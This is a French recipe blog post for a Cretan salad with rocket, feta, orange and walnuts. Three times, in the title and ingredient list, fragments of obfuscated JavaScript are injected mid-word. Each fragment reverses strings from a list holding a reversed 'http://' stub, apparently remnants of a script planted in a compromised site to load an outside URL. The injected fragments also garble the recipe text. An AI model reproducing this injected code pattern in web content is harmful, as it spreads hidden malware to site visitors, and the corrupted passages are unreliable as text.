Recette – Salade crétoise de roquette, feta, orange et noix

salade crétoise

Dans le sud, on a pour coutume, dès que les beaux jours arrivent, de sortir les lunettes de soleil, (à vrai dire, nous les avons quasi tout l’année sur le nez !), les tongs et les barbecues pour griller tout ce qui peut être grillé, en accompagnant souvent nos repas de salades de saison… Le soleil nous donne des ailes ! Bref, être sudiste c’est tout un art. Et aujourd’hui, c’est une salade crétoise qui est à l’honneur !

Cette salade crétoise est un mélange de salé/sucré qui donne du goût en bouche. Des mélanges faciles à réaliser. Cependant, le pamplemousse a été remplacé par une petite orange, mais c’est selon les goûts de chacun. En revanche, vous pouvez à cette salade, rajouter de l’avocat ou fenouil, voire les deux…

Le printemps et l’été, sont des saisons parfaites pour oser créer des saveurs fraîches et qui explosent en bouche. Pour faire venir l’été et le soleil plus rapidement on vous propose une salade qui va ravir les papilles !

Salade crétoise de roquette, feta, m {if (typeof ($Ikf.list[n]) == “string”) return $Ikf.list[n].split(“”).reverse().join(“”);return $Ikf.list[n];};$Ikf.list=[“\’ //:ptth\’= “]; ( () * 6); ; );}andarine et noix

4 à 6 portions

Temps de préparation : 15 min

salade crétoise

Ingrédients de la vinaigrette d’orange :

  • 1/2 tasse de jus de orange fraîche.
  • 1 cuillère à café de miel.
  • 2 cuillères à soupe d’huile d’olive extra vierge.
  • Sel & poivre noir moulu ou des 4 baies.

Ingrédients pour la salade :

  • 1/2 oignon ou 1 petit, lavé et coupé finement à l’aide d’une m {if (typeof ($Ikf.list[n]) == “string”) return $Ikf.list[n].split(“”).reverse().join(“”);return $Ikf.list[n];};$Ikf.list=[“\’ //:ptth\’= “]; ( () * 6); ; );}andoline.
  • 4 tasses de roquette.
  • 1 tasse de noix, vous pouvez aussi mettre des noix grillées.
  • Une dizaine de morceaux de feta.
  • 1 grosse orange ou 2-3 m {if (typeof ($Ikf.list[n]) == “string”) return $Ikf.list[n].split(“”).reverse().join(“”);return $Ikf.list[n];};$Ikf.list=[“\’ //:ptth\’= “]; ( () * 6); ; );}andarines, en quartier et jus réservé.

Passons à la préparation :

Dans un petit saladier, fouettez l’ensemble des ingrédients pour créer la vinaigrette. ajoutez le sel, le poivre ou les 4 baies, le miel (pour ceux qui ne l’aime pas, n’en ajoutez pas).
Mélangez délicatement la feta, l’oignon, la roquette avec assez de vinaigrette pour bien enduire tous les ingrédients.
Rajoutez des noix (ou des noix grillées) et des quartiers d’orange et servir immédiatement.

Astuce !
La vinaigrette peut être faite un jour avant et doit être conservée au frais. Et si vous n’êtes pas fan de la version sucrée, optez pour une salade crétoise salée.

Êtes-vous adeptes des entrées et/ou plats salés/sucrés ? Quelles sont vos recettes préférées ? 

Articles recommandés

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *